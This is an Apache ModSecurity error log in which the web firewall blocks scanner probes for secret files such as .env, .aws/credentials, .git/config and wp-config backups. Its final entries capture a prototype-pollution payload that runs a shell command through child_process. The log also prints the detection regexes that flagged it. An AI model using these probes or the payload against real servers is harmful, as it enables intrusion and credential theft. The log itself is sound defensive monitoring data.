[Wed Jan 07 03:50:28.312805 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YAAAAAM"]
[Wed Jan 07 03:50:28.312985 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YAAAAAM"]
[Wed Jan 07 03:50:28.361167 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YQAAAAM"]
[Wed Jan 07 03:50:28.361393 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YQAAAAM"]
[Wed Jan 07 03:50:28.361568 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YQAAAAM"]
[Wed Jan 07 03:50:28.415599 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YgAAAAM"]
[Wed Jan 07 03:50:28.415928 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YgAAAAM"]
[Wed Jan 07 03:50:28.416196 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YgAAAAM"]
[Wed Jan 07 03:50:28.473548 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YwAAAAM"]
[Wed Jan 07 03:50:28.473763 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YwAAAAM"]
[Wed Jan 07 03:50:28.474031 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aV3J9BbsuCSf9NTQ9s_0YwAAAAM"]
[Wed Jan 07 03:50:28.547023 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aV3J9BbsuCSf9NTQ9s_0ZAAAAAM"]
[Wed Jan 07 03:50:28.547144 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aV3J9BbsuCSf9NTQ9s_0ZAAAAAM"]
[Wed Jan 07 03:50:28.547357 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aV3J9BbsuCSf9NTQ9s_0ZAAAAAM"]
[Wed Jan 07 03:50:28.547541 2026] [:error] [pid 1248392] [client 45.148.10.159:59180] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aV3J9BbsuCSf9NTQ9s_0ZAAAAAM"]
[Wed Jan 07 03:51:00.743175 2026] [:error] [pid 1248393] [client 45.148.10.159:36786] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aV3KFBeYWvWJmu8YY0xpSwAAAAQ"]
[Wed Jan 07 03:51:00.743436 2026] [:error] [pid 1248393] [client 45.148.10.159:36786] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aV3KFBeYWvWJmu8YY0xpSwAAAAQ"]
[Wed Jan 07 03:51:00.743605 2026] [:error] [pid 1248393] [client 45.148.10.159:36786] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aV3KFBeYWvWJmu8YY0xpSwAAAAQ"]
[Wed Jan 07 03:51:09.409203 2026] [authz_core:error] [pid 1248390] [client 45.148.10.159:36814] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Wed Jan 07 03:51:13.546155 2026] [authz_core:error] [pid 1248392] [client 45.148.10.159:57008] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Wed Jan 07 03:51:13.587060 2026] [:error] [pid 1248392] [client 45.148.10.159:57008] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aV3KIRbsuCSf9NTQ9s_0aQAAAAM"]
[Wed Jan 07 03:51:13.587289 2026] [:error] [pid 1248392] [client 45.148.10.159:57008] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aV3KIRbsuCSf9NTQ9s_0aQAAAAM"]
[Wed Jan 07 03:51:13.587443 2026] [:error] [pid 1248392] [client 45.148.10.159:57008] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aV3KIRbsuCSf9NTQ9s_0aQAAAAM"]
[Wed Jan 07 03:51:32.338704 2026] [:error] [pid 1249076] [client 45.148.10.159:52328] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /api/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aV3KNAF561dl39d9DvqUagAAAAc"]
[Wed Jan 07 03:51:32.338912 2026] [:error] [pid 1249076] [client 45.148.10.159:52328] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aV3KNAF561dl39d9DvqUagAAAAc"]
[Wed Jan 07 03:51:32.339127 2026] [:error] [pid 1249076] [client 45.148.10.159:52328] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/config/config.yml"] [unique_id "aV3KNAF561dl39d9DvqUagAAAAc"]
[Wed Jan 07 03:51:32.559393 2026] [:error] [pid 1248391] [client 45.148.10.159:52338] [client 45.148.10.159] ModSecurity: Warning. Matched phrase ".travis.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .travis.yml found within REQUEST_FILENAME: /.travis.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aV3KNDNvD-ZISLd-2fIw0wAAAAI"]
[Wed Jan 07 03:51:32.559603 2026] [:error] [pid 1248391] [client 45.148.10.159:52338] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aV3KNDNvD-ZISLd-2fIw0wAAAAI"]
[Wed Jan 07 03:51:32.559758 2026] [:error] [pid 1248391] [client 45.148.10.159:52338] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.travis.yml"] [unique_id "aV3KNDNvD-ZISLd-2fIw0wAAAAI"]
[Wed Jan 07 03:51:33.636981 2026] [:error] [pid 1249082] [client 45.148.10.159:52392] [client 45.148.10.159] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aV3KNXjJiT_p8WUQzhtDiAAAAAg"]
[Wed Jan 07 03:51:33.637206 2026] [:error] [pid 1249082] [client 45.148.10.159:52392] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aV3KNXjJiT_p8WUQzhtDiAAAAAg"]
[Wed Jan 07 03:51:33.637358 2026] [:error] [pid 1249082] [client 45.148.10.159:52392] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "aV3KNXjJiT_p8WUQzhtDiAAAAAg"]
[Wed Jan 07 19:48:56.602326 2026] [:error] [pid 1248389] [client 45.144.212.58:56140] [client 45.144.212.58] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aV6qmKhAlUMkVcegDmo70gAAAAA"]
[Wed Jan 07 19:48:56.602645 2026] [:error] [pid 1248389] [client 45.144.212.58:56140] [client 45.144.212.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aV6qmKhAlUMkVcegDmo70gAAAAA"]
[Wed Jan 07 19:48:56.602822 2026] [:error] [pid 1248389] [client 45.144.212.58:56140] [client 45.144.212.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aV6qmKhAlUMkVcegDmo70gAAAAA"]
[Wed Jan 07 21:12:59.913914 2026] [:error] [pid 1248394] [client 52.28.0.251:50134] [client 52.28.0.251] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV6-SyKP3LfiSmVjqw0tlwAAAAU"]
[Wed Jan 07 21:12:59.914398 2026] [:error] [pid 1248394] [client 52.28.0.251:50134] [client 52.28.0.251] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV6-SyKP3LfiSmVjqw0tlwAAAAU"]
[Wed Jan 07 21:12:59.915304 2026] [:error] [pid 1248394] [client 52.28.0.251:50134] [client 52.28.0.251] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aV6-SyKP3LfiSmVjqw0tlwAAAAU"]
